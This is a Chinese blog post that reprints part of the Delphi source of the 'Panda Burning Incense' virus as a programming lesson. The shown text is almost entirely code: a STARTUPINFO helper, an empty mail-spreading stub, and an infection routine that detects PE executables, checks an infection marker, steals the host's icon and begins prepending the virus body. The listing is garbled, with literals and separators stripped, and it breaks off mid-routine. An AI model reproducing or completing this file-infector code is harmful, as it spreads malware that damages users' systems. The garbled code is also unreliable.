
从“熊猫烧香”中学程序[2]


发布日期:2021/2/14
 
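{ Fills in the STARTUPINFO record that is handed to process creation.

  Si    - record to initialise; only the fields assigned below are written.
  State - show-window value (an SW_* constant) stored in wShowWindow.

  The listing as published had lost its '.' separators and numeric
  literals (e.g. "Sicb", "SicbReserved := ;"), so it did not compile.
  Field names are restored from the Win32 STARTUPINFO layout; the second
  reserved pair is cbReserved2 / lpReserved2. }
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
  Si.cb := SizeOf(Si);            // size field must match the record passed in
  Si.lpReserved := nil;
  Si.lpDesktop := nil;
  Si.lpTitle := nil;
  // STARTF_USESHOWWINDOW is what makes the wShowWindow value take effect.
  Si.dwFlags := STARTF_USESHOWWINDOW;
  Si.wShowWindow := State;
  Si.cbReserved2 := 0;
  Si.lpReserved2 := nil;
  // NOTE(review): the remaining fields are not cleared here; with only
  // STARTF_USESHOWWINDOW set they should be ignored, but a caller that
  // wants a fully defined record has to zero it before calling.
end;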

{ Send virus-carrying mail. Not implemented in this listing: the body below is empty. }

procedure SendMail;

begin

// Unimplemented stub: the original author left the body empty for someone else to write.

end;

{ 感染PE文件 }

procedure InfectOneFile(FileName: string);

var

HdrStream SrcStream: TFileStream;

IcoStream DstStream: TMemoryStream;

iID: LongInt;

aIcon: TIcon;

Infected IsPE: Boolean;

i: Integer;

Buf: array[] of Char;

begin

try //出错则文件正在被使用退出

if CompareText(FileName JAPUSSYEXE) = then //是自己则不感染

Exit;

Infected := False;

IsPE := False;

SrcStream := TFileStreamCreate(FileName fmOpenRead);

try

for i := to $ do //检查PE文件头

begin

SrcStreamSeek(i soFromBeginning);

SrcStreamRead(Buf );

if (Buf[] = #) and (Buf[] = #) then //PE标记

begin

IsPE := True; //是PE文件

Break;

end;

end;

SrcStreamSeek( soFromEnd); //检查感染标记

SrcStreamRead(iID );

if (iID = ID) or (SrcStreamSize < ) then //太小的文件不感染

Infected := True;

finally

SrcStreamFree;

end;

if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出

Exit;

IcoStream := TMemoryStreamCreate;

DstStream := TMemoryStreamCreate;

try

aIcon := TIconCreate;

try

//得到被感染文件的主图标(字节)存入流

aIconReleaseHandle;

aIconHandle := ExtractIcon(HInstance PChar(FileName) );

aIconSaveToStream(IcoStream);

finally

aIconFree;

end;

SrcStream := TFileStreamCreate(FileName fmOpenRead);

//头文件

HdrStream := TFileStreamCreate(ParamStr() fmOpenRead or fmShareDenyNone);

try

//写入病毒体主图标之前的数据

CopyStream(HdrStream DstStream IconOffset);

//写入目前程序的主图标

CopyStream(IcoStream DstStream IconOffset IconSize);

//写入病毒体主图标到病毒体尾部之间的数据

CopyStream(HdrStream IconTail DstStream IconTail HeaderSize IconTail);

//写入宿主程序
